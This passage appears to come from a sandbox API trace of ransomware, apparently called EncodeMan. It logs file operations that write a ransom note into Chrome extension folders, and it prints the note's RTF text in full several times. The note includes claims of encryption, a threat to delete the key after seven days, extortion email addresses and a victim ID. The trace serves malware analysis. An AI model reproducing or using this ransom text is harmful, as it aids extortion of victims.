\\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0272.349] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0272.349] CloseHandle (hObject=0x294) returned 1 [0272.349] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\#readme_eman#.rtf")) returned 0xffffffff [0272.349] GetLastError () returned 0x2 [0272.349] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0272.350] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.350] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.350] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd 